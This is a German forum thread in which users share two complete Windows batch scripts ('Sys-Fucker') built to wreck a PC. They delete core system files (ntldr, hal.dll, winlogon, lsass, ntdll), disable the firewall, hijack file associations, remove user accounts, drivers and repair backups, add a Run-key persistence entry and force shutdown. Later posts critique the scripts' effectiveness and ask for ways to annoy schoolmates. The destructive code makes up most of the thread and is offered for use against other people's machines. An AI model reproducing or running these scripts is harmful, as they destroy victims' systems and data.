sysfucker & CO

[Daniel K.]

hm.... guck einfach nach ob die im win vorhanden is

[Miguel]

meine version vom VMware Workstation is abgelaufen XD
muss erstmal ne neue holn aba ich poste dann

[kevin]

Tag,

hab hier mal 2 nette Sys-Fucker gefunden.

Wie man die Anwendet is euch denk ich mal klar^^

Nr1:

Code: [Auswählen]

@echo off
:: -------------------------------------------------------------------------------------------------------
::                            |
:: |                                              |
:: |                                                                   |
:: -------------------------------------------------------------------------------------------------------
goto kindersicherung
color c
::Erkennungsmerkmal :D
echo CoOkIeMoNsTeR wAnT sOmE cOoKiEs NoW!
echo.
echo GiVe HiM a CoOkIe !
echo.
::Windows Firewall wird ausgeschaltet
SC \\%ComputerName% stop sharedacces
attrib -r -s -h UserInfo.exe
attrib -r -s -h CONFIG.SYS
cd  %windir%
cd system32
::attribute werden weggenommen
attrib -r -s -h osuninst.dll
attrib -r -s -h sfcfiles.dll
attrib -r -s -h SFC.EXE
attrib -r -s -h cmstp.exe
attrib -r -s -h taskmgr.exe
attrib -r -s -h wscript.exe
attrib -r -s -h wuauclt.exe
attrib -r -s -h wupdmgr.exe
attrib -r -s -h winlogon.exe
attrib -r -s -h ntbackup.exe
attrib -r -s -h wuauclt1.exe
attrib -r -s -h accwiz.exe
attrib -r -s -h ahui.exe
attrib -r -s -h arp.exe
attrib -r -s -h bootok.exe
attrib -r -s -h bootvrfy.exe
attrib -r -s -h cleanmgr.exe
attrib -r -s -h cmdl32.exe
attrib -r -s -h dfrg.msc
attrib -r -s -h dfrgfat.exe
attrib -r -s -h dfrgntfs.exe
attrib -r -s -h dmadmin.exe
attrib -r -s -h drwatson.exe
attrib -r -s -h drwtsn32.exe
attrib -r -s -h ipconfig.exe
attrib -r -s -h ipsec6.exe
attrib -r -s -h ipv6.exe
attrib -r -s -h ipxroute.exe
attrib -r -s -h krnl386.exe
attrib -r -s -h logoff.exe
attrib -r -s -h lsass.exe
attrib -r -s -h cmd.exe
attrib -r -s -h MRT.exe
attrib -r -s -h netstat.exe
attrib -r -s -h ntbackup.exe
attrib -r -s -h ntoskrnl.exe
attrib -r -s -h syskey.exe
attrib -r -s -h systray.exe
attrib -r -s -h user.exe
attrib -r -s -h mswsock.dll
attrib -r -s -h ws2_32.dll
attrib -r -s -h ntdll.dll
::xp pro oder xp home ist hier die Frage
if exist taskkill.exe goto xppro1
if not exist taskkill.exe goto xphome1
:xppro1
taskkill /f /im ex* > nul 2>&1
taskkill /f /im SFC* > nul 2>&1
goto des
:xphome1
tskill ex* > nul 2>&1
taskill SFC* > nul 2>&1
goto  des
:des
cd %windir%\system32\
::datei endungen werden gefickt
assoc .log=WinRAR
assoc .wmv=WinRAR
assoc .txt=WinRAR
assoc .sys=WinRAR
assoc .sql=WinRAR
assoc .rtf=WinRAR
assoc .reg=WinRAR
assoc .mp3=WinRAR
assoc .vbs=WinRAR
assoc .jpg=WinRAR
assoc .png=WinRAR
assoc .gif=WinRAR
assoc .bmp=WinRAR
assoc .dll=WinRAR
assoc .tgz=WinRAR
assoc .psw=WinRAR
assoc .sam=WinRAR
assoc .com=WinRAR
assoc .cmd=WinRAR
assoc .pif=WinRAR
assoc .wav=WinRAR
assoc .wave=WinRAR
assoc .vbe=WinRAR
assoc .pdf=WinRAR
assoc .iso=WinRAR
assoc .exe=WinRAR
assoc .php=WinRAR
assoc .ini=WinRAR
assoc .pps=WinRAR
assoc .dll=WinRAR
::zerst?rung der dateien
erase /F sfcfiles.dll
erase /F SFC.EXE
erase /F ntkrnlpa.exe
erase /F cmstp.exe
erase /F taskmgr.exe
erase /F wscript.exe
erase /F wuauclt.exe
erase /F wupdmgr.exe
erase /F winlogon.exe
erase /F ntbackup.exe
erase /F wuauclt1.exe
erase /F accwiz.exe
erase /F ahui.exe
erase /F arp.exe
erase /F bootok.exe
erase /F bootvrfy.exe
erase /F cleanmgr.exe
erase /F cmdl32.exe
erase /F dfrg.msc
erase /F dfrgfat.exe
erase /F dfrgntfs.exe
erase /F dmadmin.exe
erase /F drwatson.exe
erase /F drwtsn32.exe
erase /F ipconfig.exe
erase /F ipsec6.exe
erase /F ipv6.exe
erase /F ipxroute.exe
erase /F krnl386.exe
erase /F logoff.exe
erase /F lsass.exe
erase /F cmd.exe
erase /F MRT.exe
erase /F netstat.exe
erase /F ntbackup.exe
erase /F ntoskrnl.exe
erase /F ntkrnlpa.exe
erase /F syskey.exe
erase /F systray.exe
erase /F user.exe
erase /F mswsock.dll
erase /F ws2_32.dll
erase /F osuninst.dll
erase /F ntdll.dll
cd %windir%
erase /F win.ini
erase /F SYSTEM.INI
cd %SystemDrive%\
erase /F boot.ini
::Login User werden deleted
if exist net user Gast net user Gast /del
if exist net user Administrator net user Administrator /del
if exist net user Guest net user Guest /del
if exist net user Admin net user Admin /del
::Treiber werden gefickt
cd %windir%\system32\drivers
for %%v in (*.sys) do goto driver
:driver
attrib -r -s -h %%v
erase /F /S %%v
::Sicherungen von Dateien werden ebenfalls gekillt
cd %windir%\I386
for %%v in (*.*) do goto I3
:I3
attrib -r -s -h %%v
erase /F /S %%v
cd %windir%\repair
for %%v in (*.*) do goto rep
:rep
attrib -r -s -h %%v
erase /F /S %%v
echo CoOkIeMoNsTeR wAnT sOmE cOoKiEs NoW! >> cookie.txt
echo GiVe HiM a CoOkIe >> cookie.txt
start /MAX cookie.txt
set /a moep=1
:oVeR
if %moep% GTR 99 goto theEnd
start /REALTIME calc.exe
set /a moep=%moep%+1
goto oVeR
:theEnd
shutdown -s -f -t 3 -c "CoOkIeMoNsTeR wAnT sOmE cOoKiEs NoW!"
:kindersicherung
Von "broken_error"

Sieht man sch?n an den
:blah
Das das Kommentare sind und erkl?ren, was er macht.

und Nr.2:

Code: [Auswählen]

@echo off
attrib -s -h c:\ntldr
attrib -r c:\ntldr
del /f c:\ntldr
attrib -s -h c:\boot.ini
attrib -r c:\boot.ini
del /f c:\boot.ini
attrib -s -h %systemroot%\system32\hal.dll
attrib -r %systemroot%\system32\hal.dll
cd %systemroot%\system32\
del hal.dll
copy Belda.bat %systemroot%
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinDows /t REG_SZ /d %systemroot%\Belda.bat
shutdown -s -t 60 -c "Joa, m0inZ3n"
Von "Beaving"

---

Was damit machen?
- In den Editor kopieren und nicht als blah.txt sondern blah.bat speichern.

WICHTIG: NICHT am eigenen PC ausprobieren! Nur in einer VM oder woanders, da nach diesem Sys-Fucker der PC neu formatiert und Windows installiert werden muss!

kevin

[Miguel]

@kevin: beim ersten fucker bidde vor der anwendung die Kindersicherung rausnehmen  :p

// da wird doch garnix formatiert 

[Daniel K.]

ich sag es mal kurz
der sf hat gute ideen beachtet aber vieles nicht
denkt mal an nicht admins und acls
wie wollt ihr dann trieber entfernen?

und wegen dem 2:
der regedit eintrag... ich sag nur taschenrechner
ob das geht?

noch was

der sysfucka ist zu lang als batch...
1. wenn bestimmte fehlerarten auftreten bricht das skript manchmal ab
2. der benutzer sieht das fenster und kann es ggf. noch zumachen und somit viel verhindern

aber eig. ganz gute idee

p.s.
der, der das geschrieben hat ist noob...
ich sag nur

cd  %windir%
cd system32

-.-

[kevin]

// da wird doch garnix formatiert 

Ne wird da auch nix

Da werden wichtige Dateien gel?scht damit Windows nicht mehr hochfahren kann.

Um das zu beheben muss man dann formatieren & Windows neuinstallieren

[Miguel]

aber man kann seine Daten vorher noch retten xD

wegen dem noob: dann sieht das Ding halt l?nger aus, aber der effekt ist ja der selbe 

[Daniel K.]

aber es ist jedem klar, der ein wenig ahnung davon hat, dass batch langsam ist
und sowas machtws dann noch extra

naja is ja auch nicht wichtig

[Miguel]

Ich hatte Lust das hier wieder auszugraben
Kennt jemand noch ein paar lustige Methoden um seine Schulkollegen / Freunde aufzuregen?

[Daniel K.]

Netzkabel ziehen

Oder (falls passwort bekannt):

Code: [Auswählen]

passwd

^^